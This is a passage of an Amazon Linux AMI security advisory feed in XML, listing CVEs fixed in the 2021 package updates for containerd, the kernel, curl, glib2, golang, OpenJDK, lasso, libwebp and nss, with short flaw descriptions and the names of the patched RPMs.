1728436: CVE-2019-11719 nss: Out-of-bounds read when importing curve25519 private key
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11719" title="" id="CVE-2019-11719" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11727" title="" id="CVE-2019-11727" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11756" title="" id="CVE-2019-11756" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17006" title="" id="CVE-2019-17006" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17023" title="" id="CVE-2019-17023" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12400" title="" id="CVE-2020-12400" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12401" title="" id="CVE-2020-12401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12402" title="" id="CVE-2020-12402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12403" title="" id="CVE-2020-12403" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6829" title="" id="CVE-2020-6829" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-debuginfo" version="4.25.0" release="2.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.25.0-2.45.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.25.0" release="2.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.25.0-2.45.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.25.0" release="2.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.25.0-2.45.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.25.0" release="2.45.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.25.0-2.45.amzn1.i686.rpm</filename></package><package name="nspr-debuginfo" version="4.25.0" release="2.45.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.25.0-2.45.amzn1.i686.rpm</filename></package><package name="nspr" version="4.25.0" release="2.45.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.25.0-2.45.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.53.1" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.53.1-1.58.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.53.1" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.53.1-1.58.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.53.1" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.53.1-1.58.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.53.1" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.53.1-1.58.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.53.1" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.53.1-1.58.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.53.1" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.53.1-1.58.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.53.1-6.46.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.46.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.53.1-6.46.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.53.1-6.46.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1523</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1523: medium priority package update for containerd</title><issued date="2021-07-19 17:29:00" /><updated date="2021-12-29 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-32760:
A flaw was found in containerd where pulling and extracting a specially-crafted container image can result in Unix file permission changes for existing files in the host's filesystem. Changes to file permissions can deny access to the expected owner of the file, widen access to others, or set extended bits like setuid, setgid, and sticky. This bug does not directly allow files to be read, modified, or executed without an additional cooperating process.
CVE-2021-21334:
A flaw was found in containerd CRI plugin. Containers launched through containerd CRI implementation that share the same image may receive incorrect environment variables, including values that are defined for other containers. The highest threat from this vulnerability is to data confidentiality.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21334" title="" id="CVE-2021-21334" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32760" title="" id="CVE-2021-32760" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-stress" version="1.4.6" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.6-2.7.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.6" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.6-2.7.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.6" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.6-2.7.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1524</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1524: important priority package update for kernel</title><issued date="2021-07-20 22:24:00" /><updated date="2021-07-21 18:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33909:
An out-of-bounds write flaw was found in the Linux kernel's seq_file in the Filesystem layer. This flaw allows a local attacker with a user privilege to gain access to out-of-bound memory, leading to a system crash or a leak of internal kernel information. The issue results from not validating the size_t-to-int conversion prior to performing operations. The highest threat from this vulnerability is to data integrity, confidentiality and system availability.
1970273: CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33909" title="" id="CVE-2021-33909" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.238-125.422.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1525</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1525: medium priority package update for curl</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 18:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-22924:
A flaw was found in libcurl in the way libcurl handles previously used connections without accounting for 'issuer cert' and comparing the involved paths case-insensitively. This flaw allows libcurl to use the wrong connection. The highest threat from this vulnerability is to confidentiality.
1981460: CVE-2021-22924 curl: Bad connection reuse due to flawed path name checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22924" title="" id="CVE-2021-22924" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.61.1" release="12.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.99.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.99.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.99.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.99.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.99.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.99.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.99.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.99.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.99.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.99.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.99.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.99.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1526</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1526: important priority package update for glib2</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 18:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-27219:
An issue was discovered in GNOME GLib before 2.66.6 and 2.67.x before 2.67.3. The function g_bytes_new has an integer overflow on 64-bit platforms due to an implicit cast from 64 bits to 32 bits. The overflow could potentially lead to memory corruption.
1929858: CVE-2021-27219 glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27219" title="" id="CVE-2021-27219" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2" version="2.36.3" release="5.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.22.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.22.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.22.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.22.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.22.amzn1.noarch.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.22.amzn1.x86_64.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.22.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.22.amzn1.i686.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.22.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.22.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.22.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.22.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.22.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1527</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1527: medium priority package update for golang</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-34558:
A flaw was found in golang. A panic can be triggered by an attacker in a privileged network position without access to the server certificate's private key, as long as a trusted ECDSA or Ed25519 certificate for the server exists (or can be issued), or the client is configured with Config.InsecureSkipVerify. Clients that disable all TLS_RSA cipher suites (that is, TLS 1.0-1.2 cipher suites without ECDHE), as well as TLS 1.3-only clients, are unaffected.
1983596: CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic
CVE-2021-33198:
A flaw was found in Go, where it attempts to allocate excessive memory. This issue may cause panic or unrecoverable fatal error if passed inputs with very large exponents. The highest threat from this vulnerability is to system availability.
1989575: CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents
CVE-2021-33197:
A flaw was found in Go, acting as an unintended proxy or intermediary, where ReverseProxy forwards connection headers if the first one was empty. This flaw allows an attacker to drop arbitrary headers. The highest threat from this vulnerability is to integrity.
1989570: CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33197" title="" id="CVE-2021-33197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33198" title="" id="CVE-2021-33198" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34558" title="" id="CVE-2021-34558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.15.14" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.14-1.69.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.15.14" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.14-1.69.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.15.14" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.14-1.69.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.15.14" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.14-1.69.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.15.14" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.14-1.69.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.15.14" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.15.14-1.69.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.15.14" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.14-1.69.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.14" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.15.14-1.69.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.15.14" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.15.14-1.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1528</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1528: important priority package update for java-1.8.0-openjdk</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-2388:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).
1983075: CVE-2021-2388 OpenJDK: Incorrect comparison during range check elimination (Hotspot, 8264066)
CVE-2021-2369:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Library). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).
1982879: CVE-2021-2369 OpenJDK: Incorrect verification of JAR files with multiple MANIFEST.MF files (Library, 8260967)
CVE-2021-2341:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1982874: CVE-2021-2341 OpenJDK: FTP PASV command response can cause FtpClient to connect to arbitrary host (Networking, 8258432)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2341" title="" id="CVE-2021-2341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2369" title="" id="CVE-2021-2369" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2388" title="" id="CVE-2021-2388" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.302.b08-0.67.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.302.b08-0.67.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.302.b08-0.67.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.302.b08" release="0.67.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.302.b08-0.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1529</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1529: important priority package update for lasso</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-28091:
An XML Signature Wrapping (XSW) vulnerability was found in Lasso. This flaw allows an attacker to modify a valid SAML response to include an unsigned SAML assertion, which may be used to impersonate another valid user recognized by the service using Lasso. The highest threat from this vulnerability is to data confidentiality and integrity as well as service availability.
1940089: CVE-2021-28091 lasso: XML signature wrapping vulnerability when parsing SAML responses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28091" title="" id="CVE-2021-28091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lasso-devel" version="2.5.1" release="8.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/lasso-devel-2.5.1-8.6.amzn1.x86_64.rpm</filename></package><package name="lasso-debuginfo" version="2.5.1" release="8.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/lasso-debuginfo-2.5.1-8.6.amzn1.x86_64.rpm</filename></package><package name="lasso-python" version="2.5.1" release="8.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/lasso-python-2.5.1-8.6.amzn1.x86_64.rpm</filename></package><package name="lasso" version="2.5.1" release="8.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/lasso-2.5.1-8.6.amzn1.x86_64.rpm</filename></package><package name="lasso-python" version="2.5.1" release="8.6.amzn1" epoch="0" arch="i686"><filename>Packages/lasso-python-2.5.1-8.6.amzn1.i686.rpm</filename></package><package name="lasso-debuginfo" version="2.5.1" release="8.6.amzn1" epoch="0" arch="i686"><filename>Packages/lasso-debuginfo-2.5.1-8.6.amzn1.i686.rpm</filename></package><package name="lasso-devel" version="2.5.1" release="8.6.amzn1" epoch="0" arch="i686"><filename>Packages/lasso-devel-2.5.1-8.6.amzn1.i686.rpm</filename></package><package name="lasso" version="2.5.1" release="8.6.amzn1" epoch="0" arch="i686"><filename>Packages/lasso-2.5.1-8.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1530</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1530: important priority package update for libwebp</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-36328:
A flaw was found in libwebp in versions before 1.0.1. A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1956829: CVE-2020-36328 libwebp: heap-based buffer overflow in WebPDecode*Into functions
